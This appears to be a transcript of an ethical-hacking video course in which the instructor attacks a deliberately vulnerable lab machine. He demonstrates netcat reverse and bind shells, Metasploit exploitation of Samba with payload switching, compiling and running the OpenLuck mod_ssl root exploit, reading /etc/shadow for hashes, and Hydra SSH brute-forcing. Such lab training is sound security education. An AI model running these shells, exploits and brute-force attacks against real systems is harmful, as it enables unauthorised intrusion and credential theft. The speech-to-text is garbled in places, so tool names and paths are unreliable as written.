on the fly you want to use another tool or you're you know you're in a network and the network has no access you have no internet access out you have no research capabilities you can go to the terminal and there's a great way to research this as well so let's go back up to our notes and take a peek now let's take this unix samba 2.2.1a for example and let's do a tool called search split now search points going to search for the exploit database this whole database here that we're looking through it's brought down onto your machine every time you update your machine and the the database updates it updates down your machine and all those exploits get downloaded for you already but you could say search boy and maybe we search something like samba 2.2.1a let's see what happens no results well okay um why is that well let's delete this now you cannot be too specific with search split the more specific you are the worse off you are because search split is searching the exact string that you are using now you see that we search samba and it's searching for sama in a 2. okay now we can start to see some things here we see a linux remote code execution right here and we're going to have to look through these now it's not pretty right it's not the prettiest but you see the trans to open does show up now it's not the easiest way i do prefer google but if you're in a pinch or you want to look at all the different possibilities and see maybe hey is there a 2.2 in here so like look sama 2.2.0 to 2.2.8 os x that's not our operating system but it's called trans to open and we see that over and over and over again so maybe the wheels spin again and it says hey trans to open i think that that's potentially what we're looking for here and then once we get down to the threes we know hey we've gone too far this is not our version etc we could do the same thing with let's say the mod ssl and we can say something like mod ssl2 if i type search split in front of it and do some searching there and we can see okay there's denial of service not it 2.8.x potentially right and then mod ssl 2.8.7 and another thing to look at over here denial service denial service remote remote is huge remote means remote code execution so learning to read these as well exploit check unix okay we're running on linux check remote code execution check and apache mod ssl lesson 2.8.7 check so there's three different versions of this and this is kind of why when i said earlier that you know they don't really work one's been broken they've rebuilt it i just like the one off github so we'll play around with that one in just a little bit but this is what you're doing you're either going out to google with the information that you find or you're going to search flight you're just doing research so now we've identified a couple potential vulnerabilities and we can go from there so what i encourage you to do is just do some research on this webalizer do some research on openssh see what you can find out just for research sake practice with search flight practice with google and then meet me in the next video so what i want to do before we get into exploitation i want to give you a quick sneak peek at what your notes should look like so far so you can see what good note keeping is and this is in terms of an assessment okay just in terms of an assessment and then from there we're going to practice with some other scanning tools just to get to you familiar with other things then using just nmap and then finally we'll move into our exploitation so i will see you in the next video when we look quickly at our notes now looking at our assessment notes so far so you can make this however you want to make it whatever makes sense for you is how you should do this now this is just a basic example of how i might take notes on an assessment now this is just one machine you might be scanning against hundreds of machines sometimes and that's okay you just make the notes against the machines and what findings you have so for example here i've got this machine and it's all under this one tab and we've got some nmap results and then on the nmap results we've got the different ports that i found open i did leave off the rpcs but we can see our map full results here we can see okay on 22 i found open ssh on 80. here's some interesting items i may have had you know again this is just from our notes looks familiar and then i put in the nicto scan under here and on 139 i've got the samba here and this is just notes for us again could anonymously connect to ipc with smb client but not admin your client is never going to see these so make sure you make good notes for yourself how you can understand it and importantly make sure that if somebody goes through here they can also understand it because sometimes somebody else might need to go through your report or through your notes or somebody might be helping you write your report and it's important to be clear and concise with what you're doing now i've got an exploitation tab here we have not exploited anything yet but i do have a findings tab here as well so we've got a couple findings already we've got this wonderful default test page and it's hard to see because i've got it on my screen that's blown up but you saw it once and make sure that you have the ip address or the host name in your pictures that's important and then information disclosure here with the 404 page and we've got the server header information disclosure now these are both taken in green shot and a couple things to point out just for details i've got borders added around these and i've highlighted where exactly the finding is okay so it's best to point out because if these screenshots are going in a report it's best to find out and just point out to the client exactly where it is where they need to be looking and again make sure you have your identifier here if you can have it and then here is a response from the website and again with the information disclosure so that's just a quick example of how your notes should start to form and how they should look and then we'll do another one after the initial exploitation to kind of show how we exploited this machine and how we might take some notes for the client as well and then you'll get to see this all over again in the sample report when we cover report writing towards the end of the course so that's it just a quick lesson just to make sure you're still keeping up with your notes i'm going to harp on this throughout because it's very very important so i will catch you in the next videos next little mini chapter on some additional scanning tools and we'll get right into exploitation now it's time to play around with nessus so when it comes to nessus nessus is what is called a vulnerability scanner you're going to use this quite frequently when you work as a penetration tester ethical hacker basically let's say you're doing an external assessment chances are that you're going to use nessus in that assessment probably even right away you might kick off your scans basically you're gonna send out an email saying hey scans are about to start and then you're gonna start your scans and then you're gonna let those scans run and while you let those scans run they take some time you're gonna go out and do your information gathering maybe look for those breed credentials try to find something juicy on the client then you'll come back and you'll review your scan results and see if there's anything interesting there same thing with internal and the process really doesn't change we use nessus quite a bit so we're going to use nessus here and just see what it looks like and how we can use it to our advantage so let's go ahead and just go out to google and we're going to google nessus download and we're going to go to downloads right here from tenable actually we'll download nessus right here sorry and up at the top we are looking for 64-bit debian so it says ubuntu but we're just looking for the debian so we're going to go ahead and just click on that and download it we'll agree we won't even read it and we'll save here and this will take a minute or so to download depending on your connection speed so if you need to pause go ahead and pause now we're going to open up a terminal and i'll make this a little bit bigger and i'm going to cd over to my downloads folder because that's where it is and then we're going to say dpkg which is d package and we're going to install with the dash i then we're just going to say nessus there we go just tab if you have nothing in there capital n on the nessus and it should autocomplete and then we'll hit enter and it's going to grab the package and then start to download it here and install it you can see automatically it has been installed so it says you can start nissa scanner by typing forward slash etsy in it dnsd start we're just going to copy that and paste it and then we're going to navigate to this cali 443 84 8834 i cannot talk and then you're going to see your connection's not secure we're just going to say advanced add exception confirm and here is nessus now this is going to compile plug-ins here so this is going to take some time go ahead and let this finish and when it does go ahead and say we're going to download or install nessus essentials okay and then you're going to provide it with your name and you need a valid email for an activation code all right once your activation code has arrived via email go ahead and just copy paste and then hit continue and then it's going to ask you for a username so i'm just going to say h adams for me and then i'll just do password123 because you know i'm super secure i'm not going to save and then now it's going to take a minute so just go ahead and pause your video let this install go get a drink go get some coffee whatever it is that makes you happy and once your nessus is installed and you are at a login screen go ahead and log in and then come back to the video and we'll start from there that took forever all right so we have loaded nessus it's installed and now we're brought to this blank screen that says my scans why is it blank well it's blank because we haven't made a scan yet so let's go ahead and go up to new scan and let's quickly talk about what we're capable of doing so this is the free edition of nessus this means that we can scan against any private ip address and we can scan up to 16 of those i do believe at one time so remember back to the networking section of your class a through class c that's what we're capable of scanning here if you were to try to go out and scan a website or an external host not gonna happen so we do have a couple options here we're gonna start with this basic network scan and then we'll talk a little bit about the advanced scan so let's go ahead and click on this basic network here and what we can do is we can just type in something like keyoptrix for the name and i just always copy this because you need a description i just like to paste it in the description as well and then down here it's going to say hey what targets do you want to scan against well we're only going to provide one ip address and that is the iep of chiotrix and then let's go with the tabs here on the side we've got the schedule tab schedule sounds exactly what it sounds like it's scheduling so let's say that you are into automation and you're working as a pen tester and you it's a monday morning at eight maybe you wanna sleep in just a little bit longer and you say hey you know what i got to email a client i'll schedule that email will go to 8 o'clock and then the email is going to say hey we're kicking off scans right now and at 801 maybe your scan can kick off and you can schedule that to happen and then you can wake up a little late pro tips there also you can enable scanning for once daily weekly monthly yearly so if you're in a business you can do this on a periodic basis and get updated scan results there's also notifications via smtp if you have an smtp server most importantly discovery so it's going to do a port scan of common ports here i actually like to do port scan of all ports again this is the same thing as like a dash p versus a dash p dash you see the one through sixty five thousand five thirty five here we come down just common ports i'm guessing top one thousand so let's go down into assessment and we see scan type default so we can scan default we can scan for web vulnerabilities we can scan for all web and all web complex let's just scan for known web vulnerabilities if we go into complex it's going to take a while and this just depends on how deep into the scan you want to go but we're just going to say for now scan for known web vulnerabilities and it'll show what it's going to do it's going to do some page crawling do some directory traversing and look for vulnerabilities okay on the report it's going to say hey can we edit scan results yes we can should we display hosts that respond to ping display unreachable host i just leave this as default most the time and then on the advanced tab we have scan type i just like to say default here so we'll save this and then we'll go ahead and just launch it and you'll see the wheel start spinning and now it means we're running and this is going to take some time so while this is going on let's go ahead and hit new scan up here and let's look at this as well so we've got the advanced scan and they've got other scans here which i don't use a lot of but you might have used them in the past if you're familiar with nessus or they've got little one-offs like they've got this shell shock detection and it looks like they've got the shadow brokers detection here so they've got a couple different scans even a malware scan but we're going to go into advanced scan these are the most common two you'll be using same deal here and when we go into discovery you see the discovery is a little bit different so we've got host scanning and it says hey do you want to ping the host or maybe you don't want to ping the host and if we do ping the host what are we looking for are we looking for arp tcp icmp or udp what do we want to scan do we want to scan network printers if we're doing an internal network assessment maybe we want to click that maybe not you know and we can do a different types of scanning here there's a lot more options which is what advanced scanning is for we could do port scanning you see the syn scan comes up again aka stealth scanning we could do udp and even down here it says it's really not possible for udp to pick up between open and filtered ports so udp scanning takes forever and it's not always reliable we can do service discovery i kind of just leave these blank or leave them as default and then we come through assessment same thing it just gives us additional options here so it's always good to click through these do we want to brute force any logins we could use hydra to do brute forcing if we want we could test for default accounts on if we could discover like an oracle database etc but this is going to go through and try empty passwords try log in as password etc so this just does a little bit more here we can scan web applications and we can say hey we want to use a specific user agent or we want to crawl from a certain web page how many pages are we going to crawl again it just gives us more control so if we come down here reporting looks the same and then advanced we have a little bit of more options here as well but again either either way if you use advanced scan i would start with the basic scan just as a beginner and then kind of play around with the advanced scan and see if you can scan against the same host and maybe get back more information and maybe kiatrix is a good one to play with but let's go ahead and go over to credentials and now if you had credentials for a machine and you wanted to like log into that machine via ssh or windows or even snmp you can enter in credentials and you could scan a little bit deeper on the machine but you're likely never going to get that as a pen tester because you usually don't have any access so let's go back to our scans and you see now that it's scanning and running the nice thing is that it does update vulnerabilities as it finds them and it is finding them we're actually at 99 right now so you can click in it and you can see that it's got all different kind of vulnerabilities and right now they're kind of grouped so we won't worry about them too much we're going to ungroup this once it's done so i tell you what go ahead and let your scan finish once your scan's finished i'm going to meet you over in the next video which is going to be part two we're going to look at the scan results talk about them a little bit and see what nessus can do for us now on to part two our scan results are done and we can tell because we've got a nice check mark here that says complete so we're just going to click into our scan results and looking at the overview we can see here that we've got five critical 38 highs 59 mediums 10 lows and 67 informational so we're going to click on the vulnerabilities here and let me make this bigger so we're going to do is we're going to take a peek at this and this new version of nessus actually starts grouping these together let's go ahead and hit settings and disable groups and that'll show us by severity so look what's coming back up openssl unsupported let's check it out 0.9.6 b 1.1.0 and it's saying according to banner the remote server is running openssl and it doesn't tell us much about it we'd actually have to do a little bit of research click into this see why this is such a bad thing but this is absolutely out of date okay so if we're making a screenshot here we're gonna say hey this is out of date we see this installed version it's recommended to patch to this version so if you're taking notes you can go ahead and add that into your notes for your vulnerabilities this is insufficient patching come back through here it says even open ssh has remote privilege escalation it's got remote overflows so it looks like you could possibly perform an overflow against ssh so if you did some research and you were able to find a vulnerability with that that's cool and we come through here and you see the apache has denial service cross-site scripting again apache looks like insufficient patching and mod ssl shows up open ssl shows up and i mean we've just got vulnerability after vulnerability so we would write a lot of these up and depending on the assessment and how the assessment was going depends on the severity that we're going to write up now if we find remote code execution we get a lot of access to a client and a client just lights up a christmas tree when it comes time to reviewing their scans then a lot of these uh you know we might report on a lot of these and we might not report on a lot of lows or a lot of the mediums but if we're in the opposite situation where you know we aren't finding a lot but there's still stuff to report then we might report on like hey open ssl is you know it's out of you know it's out of date and then we go the next page and we find a low and maybe there's like okay there's there's something in here that's related to ssl tls this one is an unsupported cipher we might report that as well just depending on the potential in how many vulnerabilities that there actually are so as of right now it looks like this box is pretty critical but what we also do as penetration testers is we take all the results in front of us and what we'll do is we'll come in and we'll download this nexus file we'll take that nessus file and there's tools out there to convert a nes file into an excel document and it makes it nice and pretty and we'll hand that over to the client as well and in the report it'll say hey look we've covered some of the vulnerabilities there's no way for us to touch all of them because this is a timed assessment we focused on the low-hanging fruit we focused on what we could so please do go look at your nessa scan results and all the information that we provide to you because it's super important so again if we have a client like this where we're going to have remote code execution we're going to have a lot of vulnerabilities then these things just start to stack up and this is what an ss result looks like you can click into these you can get more information and possibly even you know details on how to exploit it and how to uh solve it as well so um there's useful links in here a lot of the times and just uh you know they give you information but you should always go out and verify never trust your vulnerability scanner just because it says hey we detected it you should go out and look and find it just like we had that screenshot from before with the apache service version we know this exists we wouldn't provide a screenshot of the output of nessus we would go provide a screenshot that says hey we actually proved that we know it's there and you're out of date so hopefully that gives you an idea of what we're doing with nessus and why we're using it and how it could be an advantage to us sometimes we're so overwhelmed with everything around us that we might miss some vulnerabilities and it's nice to just have a scanner detect a lot of vulnerabilities just for us and it gives us something to look through something to verify double check etc it's just an extra layer of vulnerability assessment for us it's a friend in the game so i own two programs as a pen tester two programs that i pay for nessus license is one burp suite pro is the other so that's it for this section now we're gonna move on to exploitation really start to get into the fun stuff talk about some different exploitation techniques you're gonna see and then we'll do a bunch of box walkthroughs and get into exploit development and it's about to get so fun this is the fun part of the course up until this point it's just been scanning enumeration learning about the process and it's been nine hours of course materials so far almost eight hours of course material just to get to this point that's how important i think that information gathering and scanning enumeration are along with the foundations and the materials you need to know all that before you can just start exploiting machines so now we're there congratulations pat yourself on the back we're almost halfway through the exploitation part of this course so once we get to the middle of the course capstone i think it's gonna be really fun and exciting so that's it end of spiel i'll see you over in the next section when we start learning exploitation before we could start the cool exploitation phase we have to first define a couple things so we're going to quickly define different shell types we're going to see and then we're going to define different types of payloads we're going to see so let's first start with the shells the most common shell you're going to see is what is called a reverse shell now in this example it is using a tool called netcat which you're going to see here shortly and a shell all a shell is is access to a machine so when we say we pop a shell that means we get access to a machine now a reverse shell a reverse shell means that a victim connects to us here you see it says target connecting to attack box and you may get asked this question about shells in an interview what is a reverse shell what is a bind shell so a reverse shell means again a victim connects to us you see that it says target is connecting attack box is listening so what's happening here is that on the attack box you can see that we have netcat this is nc and we're just listening uh on a port here lvp means listening verbose port so we're listening on port four four 4444 that means on our machine we're opening up that port when we use netcat on this machine it's going to say hey netcat i want to connect to this ip address here i want to connect to it on port 444. and when i do that i'm going to establish this bin shell here so i'm going to execute bin shell which is a linux machine if this was windows it would be command.exe so what we're going to do is we're going to say hey let's connect over here and this is going to connect so all we're going to do with reverse shell is we're going to listen now with the bind shell a little bit different we have our attack box and then our target so with the bind shell we actually open up a port on the machine then we connect to it so we fire off an exploit the x-play goes in and it opens up a port and then it's listening for us to connect when we connect on that specific port to that specific machine with netcat then we're going to go ahead and get that shell and on this side it's going to execute for us that bin sh now if we go back same thing here we're going to send some sort of exploit that's going to talk back and say hey i want to when you exploit this go ahead and just connect to 4444 on this machine now this is going to come together very clearly when we get into our exploit development part here in just a little bit but all you need to know right now is that a reverse shell means the target connects back to us a bind shell means we connect to the target now a little bit more about reverse shells you're going to use reverse shells 95 of the time there are instances where you're going to use bind shells bind shells most likely are going to be on an external assessment if you think about it a reverse shell you're sitting in your home network and you are sitting on a vm and that vm is using an internal ip address that's talking out through nat it's going through your public ip address and you're attacking a target well how are you going to connect that public ip address of the target back to yourself on an internal ip you're going to have to set a port forward or port trigger on your firewall to talk into that specific machine it's a little bit of extra work you're opening some stuff up on your side the other idea is to say hey buying shell why don't i just go ahead and open a port up on that target i'll nap my way through my public ip address and i'll just connect to that port it doesn't care what ip address you're coming from you see it's just listening so we can come from any ip address and connect that port on that machine so this is where bind shells are useful when we have to bypass some sort of firewall or just make sense sometimes a reverse shell just doesn't work and we have to use a bind shell anyway so we have to think about the connection and how it's getting to and from us most of the time especially because you're going to practice a lot in labs and you're going to do internal assessments as well most of your shelves are going to come in the form of reverse shell however bind shells do exist and you should know what they are as well and again for an interview you should know the difference so before we finish here let's go ahead and take a look at what these look like and i'm going to log back into my machine and i've got two things open here i've got one and two we're gonna play victim and we're going to play uh target right or attacker so on the attacker if we have a reverse shell we're just going to say netcat i want to listen and i like to do nvlp but you can do lvp as well vlp it doesn't matter what order i just do the mvlp and all fours so now we're listening on any on all fours right so here we're going to say on the victim screen we're going to say hey netcat i want to connect and this is a self connection but still i want to connect to the victim machine or i want to connect to my attacker from the victim machine and our attacker's ip address is 139 they've got four four four four open let's establish that connection and we're going to offer them bin bash when we do and here's that connection so this is a reverse shell we were listening as the attacker and then the victim connected to us and then we could say something like who am i and you could see root and then host name kali and we have a connection and we offered up that bin bash here so that works so that is an example of a reverse shell so i'm going to ctrl c this connection kill it it dies over here now let's say we wanted to flip the script do we want to bind shell well now guess who needs to be listening now in this instance we're going to be listening and we're going to be offering up the bin bash because we are the victim okay so we still have to offer up whatever command line we are going to have here now all we have to do as the attacker is connect to our victim and we have the same connection you see the connection happens here who am i root hostname cali so that is the difference between a bind shell and a reverse shell remember reverse shells are most commonly used but bind shells are important again just a hammer at home reverse shell means a victim connects to us bind shell means we connect to a victim so i'll catch you over in the next video when we talk about stage versus non-stage payloads now let's talk about stage versus non-stage payloads and before we do that we must talk about a payload so a payload is what we're going to run as an exploit and when we run that exploit it's called a payload we use different types of payloads depending on what it is so you might see a windows type payload or a linux type payload or as you see on the screen interpreter type payload there's python there's all different types there's like 500 and something that we saw in metasploit alone and these payloads are what we use to send to a victim and attempt to get a shell on the machine now it's going to make more sense as we go it's okay if you're still a little bit confused on all this there are two main types of payloads that we need to pay attention to there is what we call non-stage and what we call staged now a non-stage payload sends an exploit shellcode all at once where a staged payload sends it in stages the non-stage payload is larger in size and it doesn't always work where the stage payload can actually be less stable so each has its con and we have an example of it and this is really what i want to point out is we have this non-stage payload and we have a stage payload and you see the one difference between the two all it is is a forward slash so when we see these and we're using something like metasploit and we have to pick out a payload if we see something like meterpreter underscore reverse underscore tcp this identifies that this is a non-stage payload we can ignore the windows here but here we see meterpreter forward slash reverse underscore tcp this means we have a stage payload what's happening it's saying hey stage one stage two what's happening here it's saying hey let's send this all at once so this is going to become very important very quick as we will attempt an exploit here very soon and it's not going to work and then we're going to change the payload and it's going to work beautifully so understand that what the really the takeaway is if you have a payload that does not work maybe try the other other type of that payload if you see something like reverse tcp which is a reverse shell by the way over a tcp connection if you say hey i'm going to send this stage reverse tcp it's not working all right let me try to send a non-staged reverse tcp okay that's not working but i'm sure my exploit's right so maybe i send a bind shell instead of a reverse shell here and i'll send a bind shell stage and then non-stage and we just keep trying until we find a payload that works not every payload is the right payload and we have to find the one that works for us so the takeaways remember the forward slash remember the slight differences between non-stage and stage and remember if your payload fails but you think it's the right exploit maybe change your payload so we'll see that here very shortly as we start to get into exploitation in the next few videos i am excited and let me tell you how excited i am this is not the first time i've recorded this video this is actually the second time recording this video because the first time i forgot to hit the record button so now it's blinking red right in front of me guaranteed recording and i'm still as excited even the second time walking through this i'm still as excited because this is what we've been building up for this is everything we've been doing the scanning the enumeration even the linux and the python this is all building up to this and now we're ready to exploit we're going to get our first shell we're going to pop our first shell today and i'm so excited for both of us so what we're going to do is we're going to run metasploit for this one and metasploit's a little bit automated but that's okay in the next video we're going to go ahead and cover it manually so what we're going to do is we're going to attack smb here and with smb what we're going to do is if you don't remember search split samba 2.2 we found samba 2.2.1 a we searched around we went out to the interwebs we did search floyd and we kept seeing this trans to open show up like here and here here here all down here right repeatedly and it meets the criteria everything seems to make sense it had that ipc anonymous connection as well so i think i think this is a winner and we're going to go ahead and give it a try so i'm going to copy this and we're just going to go ahead and type in msf console and load up metasploit once metasploit loads we're going to go ahead and just search for this guy and see if we can't find it now we know it exists because we did find that handy dandy rapid7 website that said it did so we're going to search it here and we're given four options now these are all operating systems here but we have been good enumerators and good investigators researchers information gatherers etc we could have willy nilly just saw 139 said hey i'm gonna try to find exploits against it and never looked at any other ports but that's not us we went out to port 80 we saw that it was running red hat we discovered linux on the machine so we know we're going to pick the linux module so we're going to say use 1 as that corresponds to this module here and then we're going to type in options and all we have to do is set a r host so remember our host stands for remote host or the victim that we're attacking so we're going to say set our host and 192.168.57134 and we're going to say options one more time make sure that that actually set in there and it did now one thing i like to do is type in show targets now there are no targets here but as you're going to see later on in the course there are often targets that we have to pick from not always is the first choice that's auto selected right for us but in this instance there's only one choice so it's the right choice so now we have two options both are going to do the same thing for us we could type in run or we could type in exploit if we want to be cool i want to be cool let's type in exploit so we're going to run this and it's going to start this brute force attack here and it's going to start opening shells and closing shells what is going on so let's control c if yours is doing this go ahead and control c interrupt this let's talk about what's happening so you see it's trying this brute force attack it's trying different different return addresses here and finally it lands on one that works and it says hey i'm going to send this stage this is always a good sign by the way sending the stage then it says hey i've got this interpreter session open because our payload has worked and then this interpreter session closed reason died that's not good so it keeps going through over and over and over and over and it's just dying what is going on well we've talked about this let's go into options again now you don't see this the first time you do it but you see it the second time because metasploit says hey if your payload's not working maybe the payload's the issue and i'm going to give you payload options this time around now we see payload options here in the middle that wasn't there before we can see that we're running linux x86 interpreter forward slash reverse underscore tcp what does that mean well that means that we are running a staged payload a couple other things to note while we're in here we see lhost that is the opposite of our host l host is us we are the listening host so we sit here and we have our ip address sometimes this auto selects correctly sometimes it doesn't in this case it did and then we have the l port which is by default all fours so that's fine for now it's fine for these lessons when you get into actually running this in the wild all fours is probably going to get you picked up pretty quick because this is a default interpreter port so if some connection sees a or some antivirus or detection software sees four four four four open up this is going to trigger an alarm here but anyway for this course you're not going to need to worry about it too much right now we're going to go ahead and set a payload we're going to say set payload and how do we know what payload to pick let's just start typing out linux and hit tab and it auto tabs out the x86 part for us and then let's just hit double tab all right now with double tab that's great look at the payload options we have we got a bunch now we've got a bunch of interpreters but unfortunately they're all staged payloads here i love a good interpreter shell and you guys will understand why as we move forward but as of right now it doesn't like we're going to be able to use one we come over to this right column here you can see that we've got other shells as well and we come down and finally down here we've got a few options that are non-staged so let's go ahead and try this shell reverse underscore tcp right here and you can just start typing that out and that should auto tab complete for you go ahead and hit enter hit options one more time to make sure that this actually works you can see here that it actually picked up and now let's go ahead and try to run this and let's see if it happens fingers crossed hey look at that so we've got a shell now and it says command shell session open five let's try who am i root host name captrix level one we have successfully rooted this machine root is the commander of the system we cannot go any deeper than this we own this machine hands down it's our machine so congratulations you have made it this far this is your first rooted machine you should be very proud pat yourself on the back you're awesome so from here we're going to go ahead and we're going to focus on port 80 and 443 and how we can exploit those manually and then we'll move on to some other exploitation techniques but for now congratulate yourself you have your first shell i'm very excited for you so i'll catch you over in the next video as we start some manual exploitation so we have gained root with medisplay but now we need to gain root with some manual exploitation so remember earlier we discovered that we had an exploit with our mod ssl and we're going to see what we could do about it so we went to google and we researched mod ssl and we came up with something called open luck if you remember that so we clicked on this open lock here and this is the same as the one that is out there on exploit database but it is fixed so remember the exploit database one is broken so we'd rather use this one that is fixed so we're going to do is we're going to follow the instructions here and this is very well laid out so it tells you to git clone this we need to do an install of an ssl dev library we need to compile and then run the exploit so very very straightforward we're going to go ahead and do exactly what it says and let's go ahead and just copy this first line here and i'm going to just make this a little smaller go into a terminal and i actually have a folder for kiatrix i'm going to cd into it and then we're going to go ahead and just paste that line and it will get clone everything if we ls now we see that it is there so let's cd into that folder the bad word folder symbol ls and now you can see that there is uh just the c file here in the readme so what we're going to do is we need to install this lib ssl dev so we're going to say app install and then lib ssl dash dab like this hit enter and then just hit enter because it says yes already this will take just a second to install and then once it does this we're going to use a tool looks like called gcc which gcc is a compiler so if you've never used c or are familiar with c we have a c file but this isn't ready to use we have to compile that c file in order to actually use it so that's what we're doing here is we're downloading a little bit of stuff to actually be able to compile that gcc is built in and we just needed some other things additionally so now we're going to do is we're going to say gcc and typically you say dash o for the output so we can call it whatever we want we'll just call this open and then we'll just specify the file you can start typing it and then tab out and then it says this l crypto which is important hit enter okay and then hit ls and you see now in pretty green green lighting up and saying hey we're executable we have our our executable right we have our script that we can run so we could say dot forward slash open and run it and you can see in here all the different options that this runs against so you remember when it was brute forcing um the last one when we saw the we saw the trans to open was kind of doing brute force in theory this is what it could do as well but here we actually have to pick a return address based on our machine so we're going to look at the usage i always like to do the application without any usage to see what the usage is and we need to use target box which is one of these down here we need to select a port maybe it says for ssl connection we're not going to be using an ssl connection so don't worry about that and then a dash c number and it says use range 40 to 50 if you don't know so our syntax is going to look something like dot forward slash open one of these offsets that we're going to pick and then it's going to be a dash c probably 40. with the box ip address in between so how do we find what we're looking for well i'm going to cheat just a little bit and tell you guys to scroll down down down down down and if we look at 6b here remember we were up against apache 1.3.20 see enumeration comes into play big time so apache 1.3.20 now there are two we can run against i'm picking this one i believe it's the more stable one um so we could pick either one but i would choose b i think a doesn't work all the time so let's choose b here and apache 1.3.20 is the indicator and again red hat linux so that's another indicator so let's copy this so we don't forget it and we're just going to scroll down and we're going to say hey dot forward slash open and we're going to paste that 0x6b and then we're going to run this against the iap address because it said box was next so 134 and then remember we had to give a dash c of 40. so that is the syntax sometimes you have to follow along and it's i don't i don't think most of them are as confusing as this when you say this is confusing i would just say it's pretty lengthy for a exploit because you have to go through all the different offsets here to find the offset and actually fire this off um but you know you have the opportunity here to actually be able to read usage and just understand your your way through it so um once you get this little syntax and all this part down it's really not that bad so to check off the list we've got the target we got the box ip address we don't need the port because we're not running against ssl we're just going to run this against port 80 and then we're going to run c of 40. so let's go ahead and try to fire that off and see what happens here and this may just take a second okay it says it's spawning a shell now we wait for the suid let's scroll up just a little bit while we're waiting here to see so it looks like it sent the shell code and it spawned a shell it says hey we have no job control in this shell and then it it has a shell here bash 2.05 that is a shell and then it's going in and it's doing um it's doing some w gets now this is able to get out to the internet it's going to go ahead and try to do wgets against these it's going to keep downloading and it's going to get the response here okay and now it says wait for the shell because it saved this dot c file here and let's see if maybe we already have a shell who am i root look at that so it looks like it downloaded something and allowed us to maybe privilege escalate here and let's say host name okay so we've gone through and we've rooted this machine with metasploit and now we've gone through and rooted this machine with the manually downloaded exploit so there's two options you're going to find out that metasploit is a more robust and popular option especially as a penetration tester now there is a common misconception or thought process put out there by certifications um the oscp for example doesn't let you use a lot of metasploit only one instance of metasploit on their exam so everybody thinks man i really shouldn't use metasploit but you're going to see in this course how useful it really is and how robust it is and if you talk to a penetration tester they're going to use the best tools available to them the certifications out there that do that are just making it harder to pass the exam intentionally than they are you know for practicality this course is all about practicality so from here now that we've exploited it manually let's talk about a couple things that we look for in post so post being post exploitation and we're going to cover this over and over and over again we're not going to get into it fully right now i just want to give you an idea as to the thought process so the first thing to think about is what is our ip address we could say ifconfig if it'll allow us to it does it depends on what kind of shell we're in and see this one is is a weird shell we could try ipa it's still not going to be found if we try some some commands like arp or route i doubt they're going to be found right now either but we want to look at like the routing table the arp table we want to see if this machine is what's called dual homed and you're going to learn more about that when we get into the pivoting but if this is this has like two nicks and we're on one network and the nick is on a second network that we never saw before then maybe we can do something called pivoting and move into that new network but we would be able to identify who the machine's talking to with an arc table or a route um we could also look at like pseudo privileges so we could say something like pseudo-l but we are root so we can run as everybody so a pseudo user as we talked about in linux linux lessons pseudo user is able to run commands as elevated but here is root where rv obviously already elevated so other things that we can do we can cap what's called the etsy password file now this is very misleading because the etsy password file used to be the password file now it just holds a placeholder so you could see all the users that are on this computer root being this one there's a lot of built-in users here but if you always scroll down to the bottom and you start the 500s that's where your users start so there's actually two users on this computer as well one's named john the other is the name harold so we look at these users and we say okay well there's no password in this password file but there used to be back in the day there used to be that's why they call it this uh and now they moved it to this placeholder of an x and what we can do is we can come in here and we can say hey cat etsy shadow and now you see the hashes are in here so these hashes are what the x is place holding for we can actually combine both of these files with the tool and go offline and try to crack these we'll work on that later on in the course but just for now like getting your wheels spinning on as to what we can do with root level access we need to start enumerating again looking at files on the computer seeing what what's out there and what we can do with it but we'll get into post exploitation techniques and thought process as we go through the active directory portion of the course because i think it plays hand in hand and we can talk about password cracking there and how to attack some of this stuff but there will be a password cracking video on on linux as well when we get into the post exploitation phase of this but that's really it for now so we've got the we've got the shadow we could take this offline try to crack it we can enumerate files we can try to you know break into user folders and see what they've got in there maybe they've got password files stored in there etc so from here we have rooted this machine twice we rooted it with metasploit we rooted it manually and now we can start moving on i do want to show you a few more attacks so here's what's going to happen over the next few videos we're going to talk about brute force attacks really quick on ssh we're going to talk about credential stuffing we're going to revisit that concept that we talked about in information gathering and then we're going to look at our notes and we're just going to compare notes and see where we're at with findings and everything else after that we're going to get into what i like to call the mid-course capstone which is going to allow us to do a bunch of exploitation against a bunch of machines and it should be really fun so end of spiel again i will catch you over in the next video as we talk about brute force attacks in a previous video we discussed ssh and that it's really not always that much of a low hanging fruit so we've got ssh here and say we want to attack it now there are three reasons we're going to do this and this is from a realistic perspective if we see ssh on an assessment we're going to try to brute force against it or use weak or default credentials and we're going to do that because one we're going to test password strength two we're going to see if we can get in with a weak password or default password and if we can that also attests to password strength correct and three we're going to see how well the blue team performs do they catch us do they see us brute forcing this should be something that should alert when is being performed but you would be surprised how often it does not so during a pen test i am as loud as possible this is not a red team assessment where we're trying to be quiet this is a pen test where we are as loud as possible and we are hoping to be caught sometimes just or just told to tone it down a little bit you know hey we're seeing you can you be more quiet and we just want to be caught sometimes so we can give kudos in a report and say hey you saw scanning here and here and kudos to you but you didn't see us scanning here and here so this is how we really help fine-tune a blue team and help fine-tune a client as well is being loud sometimes so we're going to practice being loud today and we're also going to practice brute force attacks and we have the perfect opportunity to do that with an ssh port being open on this machine so what we're going to do is we're going to use a tool called hydra and then i'll show you the metasploit way as well so hydra is a brute force tool so the syntax for hydra is going to be this we're going to say hydra and then we're going to give a dash l for the user that we're going to be utilizing in this case i want to attack root and then we're going to give a capital p for the password list so if we want to use a password list with l we can just say capital l but here we're going to say capital p for the password list and then we're just going to say user share wordless metasploit and i'm just going to double tab in this folder so you can see how many words are actually in here there's quite a bit of word list and you can space space and it has word list for all different kinds of things built in and these are all over cali so it's good to know your folder locations but user share word list is one that we'll use quite a bit and what we're going to do is we're going to utilize an attack uh with these unix passwords here so we have a unix users and unix passwords we're going to utilize the unix password list and just try to brute force with that so we'll say unix passwords something like that and then we're going to need to specify what we're attacking so we are attacking ssh like this and our ip address of our machine that we're attacking on port 22 and then we need to have a certain amount of attempts or threads at once and we're going to limit that to four and then i'm going to do a capital v for verbosity just because i want to see the user attempts flow through so that we can actually see what's going on here so once you've got the syntax ready to go go ahead and hit enter and you're gonna see that it's starting to attempt root login password with all these weak passwords here and hopefully it might find something but let's go ahead and open up a a new terminal here and we're going to just make this a little bigger and i'm going to load up metasploit as well and we're going to run the same exact thing in metasploit but i think it's good to know multiple frameworks and multiple tools to perform the same task so here we're going to search for something like ssh and this is going to be an auxiliary module so we'll just scroll up and we're going to look for something like ssh login perfect login check scanner and make sure we don't have anything else and it looks good to me so let's go ahead and take this ssh login and we're going to go ahead and say use options and now we have kind of our brute force options here let me make this a little bigger so it's prettier so we've got a brute force speed from zero to five five being the fastest try playing passwords no no no we can set a hard password and we could set a hard username we could set a user and password file a user pass user as password file uh again we can have a password file as well so we have a lot of 